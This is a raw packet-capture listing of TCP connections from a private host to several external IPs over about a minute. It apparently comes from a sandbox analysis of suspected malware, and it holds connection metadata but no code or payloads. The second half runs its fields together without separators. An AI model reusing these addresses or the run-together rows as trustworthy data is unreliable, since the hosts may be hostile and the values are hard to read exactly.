Aug 28, 2024 14:03:26.900193930 CEST | 49747 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:26.909128904 CEST | 80 | 49747 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:26.909677029 CEST | 49747 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:26.911576986 CEST | 49747 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:26.918433905 CEST | 80 | 49747 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:27.598881006 CEST | 80 | 49747 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:27.599123001 CEST | 80 | 49747 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:27.599134922 CEST | 80 | 49747 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:27.599190950 CEST | 49747 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:27.599647999 CEST | 80 | 49747 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:27.599659920 CEST | 80 | 49747 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:27.599701881 CEST | 49747 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:27.600516081 CEST | 80 | 49747 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:27.600528955 CEST | 80 | 49747 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:27.600558043 CEST | 49747 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:27.601433992 CEST | 80 | 49747 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:27.601447105 CEST | 80 | 49747 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:27.601460934 CEST | 80 | 49747 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:27.601488113 CEST | 49747 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:27.601509094 CEST | 49747 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:27.606451988 CEST | 80 | 49747 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:27.606666088 CEST | 80 | 49747 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:27.606677055 CEST | 80 | 49747 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:27.606718063 CEST | 49747 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:27.690645933 CEST | 80 | 49747 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:27.690918922 CEST | 49747 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:27.691040993 CEST | 80 | 49747 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:27.691049099 CEST | 80 | 49747 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:27.691092968 CEST | 49747 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:28.413038015 CEST | 49747 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:29.433634996 CEST | 49748 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:29.441288948 CEST | 80 | 49748 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:29.445741892 CEST | 49748 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:29.447824955 CEST | 49748 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:29.455235004 CEST | 80 | 49748 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:29.455240011 CEST | 80 | 49748 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:29.455244064 CEST | 80 | 49748 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:29.455569029 CEST | 80 | 49748 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:29.455573082 CEST | 80 | 49748 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:29.455576897 CEST | 80 | 49748 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:29.455579996 CEST | 80 | 49748 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:29.455583096 CEST | 80 | 49748 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:29.456027985 CEST | 80 | 49748 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:30.124651909 CEST | 80 | 49748 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:30.124731064 CEST | 80 | 49748 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:30.124738932 CEST | 80 | 49748 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:30.124861956 CEST | 49748 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:30.125181913 CEST | 80 | 49748 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:30.125189066 CEST | 80 | 49748 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:30.125195026 CEST | 80 | 49748 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:30.125287056 CEST | 49748 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:30.125873089 CEST | 80 | 49748 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:30.125880003 CEST | 80 | 49748 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:30.125885963 CEST | 80 | 49748 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:30.125936031 CEST | 49748 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:30.126523972 CEST | 80 | 49748 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:30.129676104 CEST | 49748 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:30.130285025 CEST | 80 | 49748 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:30.130563974 CEST | 80 | 49748 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:30.130613089 CEST | 49748 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:30.222692966 CEST | 80 | 49748 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:30.222822905 CEST | 80 | 49748 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:30.222827911 CEST | 80 | 49748 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:30.222877026 CEST | 49748 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:30.222956896 CEST | 80 | 49748 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:30.223005056 CEST | 49748 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:30.959964991 CEST | 49748 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:31.978390932 CEST | 49749 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:31.987956047 CEST | 80 | 49749 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:31.988046885 CEST | 49749 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:31.990175009 CEST | 49749 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:31.998043060 CEST | 80 | 49749 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:32.616626024 CEST | 80 | 49749 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:32.741111040 CEST | 49749 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:37.601855040 CEST | 80 | 49749 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:37.601989985 CEST | 49749 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:37.602775097 CEST | 49749 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:37.608053923 CEST | 80 | 49749 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:38.601334095 CEST | 49741 | 80 | 192.168.2.4 | 178.237.33.50
Aug 28, 2024 14:03:38.920344114 CEST | 49741 | 80 | 192.168.2.4 | 178.237.33.50
Aug 28, 2024 14:03:39.594603062 CEST | 49741 | 80 | 192.168.2.4 | 178.237.33.50
Aug 28, 2024 14:03:40.928642988 CEST | 49741 | 80 | 192.168.2.4 | 178.237.33.50
Aug 28, 2024 14:03:42.634854078 CEST | 49750 | 80 | 192.168.2.4 | 5.78.41.174
Aug 28, 2024 14:03:42.639698982 CEST | 80 | 49750 | 5.78.41.174 | 192.168.2.4
Aug 28, 2024 14:03:42.641721010 CEST | 49750 | 80 | 192.168.2.4 | 5.78.41.174
Aug 28, 2024 14:03:42.643485069 CEST | 49750 | 80 | 192.168.2.4 | 5.78.41.174
Aug 28, 2024 14:03:42.648361921 CEST | 80 | 49750 | 5.78.41.174 | 192.168.2.4
Aug 28, 2024 14:03:43.242506981 CEST | 80 | 49750 | 5.78.41.174 | 192.168.2.4
Aug 28, 2024 14:03:43.242636919 CEST | 80 | 49750 | 5.78.41.174 | 192.168.2.4
Aug 28, 2024 14:03:43.242698908 CEST | 49750 | 80 | 192.168.2.4 | 5.78.41.174
Aug 28, 2024 14:03:43.428642988 CEST | 49741 | 80 | 192.168.2.4 | 178.237.33.50
Aug 28, 2024 14:03:44.147608995 CEST | 49750 | 80 | 192.168.2.4 | 5.78.41.174
Aug 28, 2024 14:03:45.166070938 CEST | 49751 | 80 | 192.168.2.4 | 5.78.41.174
Aug 28, 2024 14:03:45.170934916 CEST | 80 | 49751 | 5.78.41.174 | 192.168.2.4
Aug 28, 2024 14:03:45.171006918 CEST | 49751 | 80 | 192.168.2.4 | 5.78.41.174
Aug 28, 2024 14:03:45.172820091 CEST | 49751 | 80 | 192.168.2.4 | 5.78.41.174
Aug 28, 2024 14:03:45.177674055 CEST | 80 | 49751 | 5.78.41.174 | 192.168.2.4
Aug 28, 2024 14:03:45.776526928 CEST | 80 | 49751 | 5.78.41.174 | 192.168.2.4
Aug 28, 2024 14:03:45.776571989 CEST | 80 | 49751 | 5.78.41.174 | 192.168.2.4
Aug 28, 2024 14:03:45.776632071 CEST | 49751 | 80 | 192.168.2.4 | 5.78.41.174
Aug 28, 2024 14:03:46.678885937 CEST | 49751 | 80 | 192.168.2.4 | 5.78.41.174
Aug 28, 2024 14:03:47.697388887 CEST | 49752 | 80 | 192.168.2.4 | 5.78.41.174
Aug 28, 2024 14:03:47.703129053 CEST | 80 | 49752 | 5.78.41.174 | 192.168.2.4
Aug 28, 2024 14:03:47.703272104 CEST | 49752 | 80 | 192.168.2.4 | 5.78.41.174
Aug 28, 2024 14:03:47.705670118 CEST | 49752 | 80 | 192.168.2.4 | 5.78.41.174
Aug 28, 2024 14:03:47.710510015 CEST | 80 | 49752 | 5.78.41.174 | 192.168.2.4
Aug 28, 2024 14:03:47.710515976 CEST | 80 | 49752 | 5.78.41.174 | 192.168.2.4
Aug 28, 2024 14:03:47.710529089 CEST | 80 | 49752 | 5.78.41.174 | 192.168.2.4
Aug 28, 2024 14:03:47.710562944 CEST | 80 | 49752 | 5.78.41.174 | 192.168.2.4
Aug 28, 2024 14:03:47.710592985 CEST | 80 | 49752 | 5.78.41.174 | 192.168.2.4
Aug 28, 2024 14:03:47.710597038 CEST | 80 | 49752 | 5.78.41.174 | 192.168.2.4
Aug 28, 2024 14:03:47.710602045 CEST | 80 | 49752 | 5.78.41.174 | 192.168.2.4
Aug 28, 2024 14:03:47.710733891 CEST | 80 | 49752 | 5.78.41.174 | 192.168.2.4
Aug 28, 2024 14:03:47.710791111 CEST | 80 | 49752 | 5.78.41.174 | 192.168.2.4
Aug 28, 2024 14:03:48.241142035 CEST | 49741 | 80 | 192.168.2.4 | 178.237.33.50
Aug 28, 2024 14:03:48.309449911 CEST | 80 | 49752 | 5.78.41.174 | 192.168.2.4
Aug 28, 2024 14:03:48.309638023 CEST | 80 | 49752 | 5.78.41.174 | 192.168.2.4
Aug 28, 2024 14:03:48.309830904 CEST | 49752 | 80 | 192.168.2.4 | 5.78.41.174
Aug 28, 2024 14:03:49.210179090 CEST | 49752 | 80 | 192.168.2.4 | 5.78.41.174
Aug 28, 2024 14:03:50.229135990 CEST | 49753 | 80 | 192.168.2.4 | 5.78.41.174
Aug 28, 2024 14:03:50.234019995 CEST | 80 | 49753 | 5.78.41.174 | 192.168.2.4
Aug 28, 2024 14:03:50.237737894 CEST | 49753 | 80 | 192.168.2.4 | 5.78.41.174
Aug 28, 2024 14:03:50.239435911 CEST | 49753 | 80 | 192.168.2.4 | 5.78.41.174
Aug 28, 2024 14:03:50.244327068 CEST | 80 | 49753 | 5.78.41.174 | 192.168.2.4
Aug 28, 2024 14:03:50.835014105 CEST | 80 | 49753 | 5.78.41.174 | 192.168.2.4
Aug 28, 2024 14:03:50.835089922 CEST | 80 | 49753 | 5.78.41.174 | 192.168.2.4
Aug 28, 2024 14:03:50.835145950 CEST | 49753 | 80 | 192.168.2.4 | 5.78.41.174
Aug 28, 2024 14:03:50.837798119 CEST | 49753 | 80 | 192.168.2.4 | 5.78.41.174
Aug 28, 2024 14:03:50.842742920 CEST | 80 | 49753 | 5.78.41.174 | 192.168.2.4
Aug 28, 2024 14:03:54.291601896 CEST | 57484 | 49738 | 172.111.137.132 | 192.168.2.4
Aug 28, 2024 14:03:54.295002937 CEST | 49738 | 57484 | 192.168.2.4 | 172.111.137.132
Aug 28, 2024 14:03:54.301990032 CEST | 57484 | 49738 | 172.111.137.132 | 192.168.2.4
Aug 28, 2024 14:03:56.035049915 CEST | 49754 | 80 | 192.168.2.4 | 3.33.130.190
Aug 28, 2024 14:03:56.039886951 CEST | 80 | 49754 | 3.33.130.190 | 192.168.2.4
Aug 28, 2024 14:03:56.039947033 CEST | 49754 | 80 | 192.168.2.4 | 3.33.130.190
Aug 28, 2024 14:03:56.042025089 CEST | 49754 | 80 | 192.168.2.4 | 3.33.130.190
Aug 28, 2024 14:03:56.047794104 CEST | 80 | 49754 | 3.33.130.190 | 192.168.2.4
Aug 28, 2024 14:03:57.553844929 CEST | 49754 | 80 | 192.168.2.4 | 3.33.130.190
Aug 28, 2024 14:03:57.832156897 CEST | 80 | 49754 | 3.33.130.190 | 192.168.2.4
Aug 28, 2024 14:03:57.832288027 CEST | 49754 | 80 | 192.168.2.4 | 3.33.130.190
Aug 28, 2024 14:03:57.832433939 CEST | 80 | 49754 | 3.33.130.190 | 192.168.2.4
Aug 28, 2024 14:03:57.832479000 CEST | 49754 | 80 | 192.168.2.4 | 3.33.130.190
Aug 28, 2024 14:03:57.834698915 CEST | 80 | 49754 | 3.33.130.190 | 192.168.2.4
Aug 28, 2024 14:03:58.038115025 CEST | 49741 | 80 | 192.168.2.4 | 178.237.33.50
Aug 28, 2024 14:03:58.574023008 CEST | 49755 | 80 | 192.168.2.4 | 3.33.130.190
Aug 28, 2024 14:03:58.578876972 CEST | 80 | 49755 | 3.33.130.190 | 192.168.2.4
Aug 28, 2024 14:03:58.578952074 CEST | 49755 | 80 | 192.168.2.4 | 3.33.130.190
Aug 28, 2024 14:03:58.581315041 CEST | 49755 | 80 | 192.168.2.4 | 3.33.130.190
Aug 28, 2024 14:03:58.586225033 CEST | 80 | 49755 | 3.33.130.190 | 192.168.2.4
Aug 28, 2024 14:03:59.981828928 CEST | 80 | 49755 | 3.33.130.190 | 192.168.2.4
Aug 28, 2024 14:03:59.981894016 CEST | 49755 | 80 | 192.168.2.4 | 3.33.130.190
Aug 28, 2024 14:04:00.084983110 CEST | 49755 | 80 | 192.168.2.4 | 3.33.130.190
Aug 28, 2024 14:04:00.089920044 CEST | 80 | 49755 | 3.33.130.190 | 192.168.2.4
Aug 28, 2024 14:04:01.112804890 CEST | 49756 | 80 | 192.168.2.4 | 3.33.130.190
Aug 28, 2024 14:04:01.127052069 CEST | 80 | 49756 | 3.33.130.190 | 192.168.2.4
Aug 28, 2024 14:04:01.127151966 CEST | 49756 | 80 | 192.168.2.4 | 3.33.130.190
Aug 28, 2024 14:04:01.131511927 CEST | 49756 | 80 | 192.168.2.4 | 3.33.130.190
Aug 28, 2024 14:04:01.136560917 CEST | 80 | 49756 | 3.33.130.190 | 192.168.2.4
Aug 28, 2024 14:04:01.136590004 CEST | 80 | 49756 | 3.33.130.190 | 192.168.2.4
Aug 28, 2024 14:04:01.136603117 CEST | 80 | 49756 | 3.33.130.190 | 192.168.2.4
Aug 28, 2024 14:04:01.136617899 CEST | 80 | 49756 | 3.33.130.190 | 192.168.2.4
Aug 28, 2024 14:04:01.136634111 CEST | 80 | 49756 | 3.33.130.190 | 192.168.2.4
Aug 28, 2024 14:04:01.136642933 CEST | 80 | 49756 | 3.33.130.190 | 192.168.2.4
Aug 28, 2024 14:04:01.136666059 CEST | 80 | 49756 | 3.33.130.190 | 192.168.2.4
Aug 28, 2024 14:04:01.136674881 CEST | 80 | 49756 | 3.33.130.190 | 192.168.2.4
Aug 28, 2024 14:04:01.136684895 CEST | 80 | 49756 | 3.33.130.190 | 192.168.2.4
Aug 28, 2024 14:04:01.583873987 CEST | 80 | 49756 | 3.33.130.190 | 192.168.2.4
Aug 28, 2024 14:04:01.584086895 CEST | 49756 | 80 | 192.168.2.4 | 3.33.130.190
Aug 28, 2024 14:04:02.647524118 CEST | 49756 | 80 | 192.168.2.4 | 3.33.130.190
Aug 28, 2024 14:04:02.652568102 CEST | 80 | 49756 | 3.33.130.190 | 192.168.2.4
Aug 28, 2024 14:04:03.704509974 CEST | 49757 | 80 | 192.168.2.4 | 3.33.130.190
                                                            Aug 28, 2024 14:04:03.709465027 CEST80497573.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:03.709825993 CEST4975780192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:03.721163034 CEST4975780192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:03.725965023 CEST80497573.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:05.108885050 CEST80497573.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:05.108900070 CEST80497573.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:05.109114885 CEST4975780192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:05.111520052 CEST4975780192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:05.116347075 CEST80497573.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:10.184467077 CEST4975880192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:10.189445019 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.189594030 CEST4975880192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:10.191402912 CEST4975880192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:10.196212053 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.871634007 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.871649981 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.871654987 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.871737003 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.871751070 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.871771097 CEST4975880192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:10.871773005 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.871784925 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.871809006 CEST4975880192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:10.871829987 CEST4975880192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:10.872050047 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.872061014 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.872071981 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.872087955 CEST4975880192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:10.872113943 CEST4975880192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:10.876611948 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.876770973 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.876811981 CEST4975880192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:10.963783026 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.963809013 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.963819027 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.963890076 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.963928938 CEST4975880192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:10.963980913 CEST4975880192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:10.968518019 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.968600988 CEST4975880192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:11.694607973 CEST4975880192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:12.713901043 CEST4975980192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:12.719063044 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:12.719131947 CEST4975980192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:12.721880913 CEST4975980192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:12.727264881 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.389419079 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.389434099 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.389441013 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.389765978 CEST4975980192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:13.389906883 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.389913082 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.389919043 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.389930964 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.389938116 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.390037060 CEST4975980192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:13.390197992 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.390202999 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.390252113 CEST4975980192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:13.393768072 CEST4975980192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:13.397073030 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.397084951 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.397738934 CEST4975980192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:13.477937937 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.477946043 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.477953911 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.478099108 CEST4975980192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:13.480019093 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.480025053 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.480082989 CEST4975980192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:14.225712061 CEST4975980192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:15.244404078 CEST4976080192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:15.249589920 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.249681950 CEST4976080192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:15.251789093 CEST4976080192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:15.256912947 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.256958008 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.257066965 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.257334948 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.257344961 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.257745981 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.257755041 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.257761955 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.257771969 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.934319019 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.934345007 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.934350014 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.934464931 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.934464931 CEST4976080192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:15.934470892 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.934483051 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.934489965 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.934598923 CEST4976080192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:15.934721947 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.934727907 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.934740067 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.934830904 CEST4976080192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:15.939670086 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.939853907 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.939938068 CEST4976080192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:16.046561003 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:16.046926975 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:16.046935081 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:16.046941042 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:16.047065973 CEST4976080192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:16.047252893 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:16.047514915 CEST4976080192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:16.756951094 CEST4976080192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:17.776503086 CEST4976180192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:17.782474995 CEST8049761188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:17.782690048 CEST4976180192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:17.784651995 CEST4976180192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:17.791134119 CEST8049761188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:18.440270901 CEST8049761188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:18.440397978 CEST8049761188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:18.440443039 CEST4976180192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:18.444166899 CEST4976180192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:18.452644110 CEST8049761188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:23.497782946 CEST4976280192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:23.502670050 CEST804976234.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:23.507682085 CEST4976280192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:23.507682085 CEST4976280192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:23.512619019 CEST804976234.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:23.975227118 CEST804976234.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:23.975501060 CEST804976234.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:23.975589991 CEST4976280192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:24.326359034 CEST5748449738172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:04:24.328270912 CEST4973857484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:04:24.333976984 CEST5748449738172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:04:25.022658110 CEST4976280192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:26.041044950 CEST4976380192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:26.046021938 CEST804976334.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:26.046262980 CEST4976380192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:26.049773932 CEST4976380192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:26.054536104 CEST804976334.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:26.541315079 CEST804976334.149.87.45192.168.2.4
